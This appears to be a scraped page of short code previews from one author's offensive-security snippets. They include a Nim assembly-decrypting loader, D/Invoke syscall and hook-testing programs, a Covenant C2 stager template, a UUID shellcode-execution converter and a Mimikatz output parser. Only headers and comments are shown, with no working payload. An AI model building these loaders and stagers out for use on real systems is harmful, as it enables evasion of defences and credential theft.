ChoiSG

import nimcrypto
import winim/clr except `[]`  # https://s3cur3th1ssh1t.github.io/Playing-with-OffensiveNim/  <-- thank you so much, 2 hours googling I almost went crazy 

#[
    All credit goes to @byt3bl33d3r (OffensiveNim) and @s3cur3th1ssh1t

    nimble install winim nimcrypto zippy
    nim c -d:danger -d:strip --opt:size rsrcDecryptAssembly.nim

    slurp = "staticRead" will read the file and store it in the variable (.rdata) on compile time. 

ChoiSG

using System;
using DInvoke;
using System.Diagnostics;
using System.Runtime.InteropServices;
using DynamicInvoke = DInvoke.DynamicInvoke;
using Data = DInvoke.Data;

namespace dinvokeSyscall
{
    class Program

ChoiSG

using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.Text;

namespace hooktester
{
    class Program

ChoiSG

using System;
using System.Net;
using System.Linq;
using System.Text;
using System.Text.RegularExpressions;
using System.IO.Pipes;
using System.Reflection;
using System.Collections.Generic;
using System.Security.Cryptography;
using System.Runtime.InteropServices;   // For PInvoke 

ChoiSG

using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
using DynamicInvoke = DInvoke.DynamicInvoke;

// Install DInvoke, Fody, and Costura Fody through Nuget 

namespace stagezero
{
    class Program

ChoiSG

#[
    Author: Marcello Salvati, Twitter: @byt3bl33d3r
    License: BSD 3-Clause
    I still can't believe this was added directly in the Winim library. Huge props to the author of Winim for this (khchen), really great stuff.
    Make sure you have Winim >=3.6.0 installed. If in doubt do a `nimble install winim`
    Also see https://github.com/khchen/winim/issues/63 for an amazing pro-tip from the author of Winim in order to determine the marshalling type of .NET objects.
    References:
      - https://github.com/khchen/winim/blob/master/examples/clr/usage_demo2.nim
]#

ChoiSG

"""
Created for : https://blog.sunggwanchoi.com/eng-uuid-shellcode-execution/ 
Repo: https://github.com/ChoiSG/UuidShellcodeExec
"""
import uuid 

def convertToUUID(shellcode):
	# If shellcode is not in multiples of 16, then add some nullbytes at the end
	if len(shellcode) % 16 != 0:
		print("[-] Shellcode's length not multiplies of 16 bytes")

ChoiSG

#include <stdio.h>
#include <time.h>
#include <string.h>

int main(){

    printf("Opening blahblahblah\n");

    int n, a = 0;
    char psy[20];

ChoiSG

// This is a Covenant Template file. Go to Covenant ==> Template ==> GruntHTTP ==> Stager Code 
// and copy/paste this.

using System;
using System.Net;
using System.Linq;
using System.Text;
using System.Text.RegularExpressions;
using System.IO.Pipes;
using System.Reflection;

ChoiSG

# Author: Will Schroeder (https://github.com/PowerShellEmpire/PowerTools/blob/master/PewPewPew/Invoke-MassMimikatz.ps1)

# modification: choisg - Very little modification has been done to simplify the output 
# helper to parse out Mimikatz output
function Parse-Mimikatz {

    [CmdletBinding()]
    param(
        [string]$raw
    )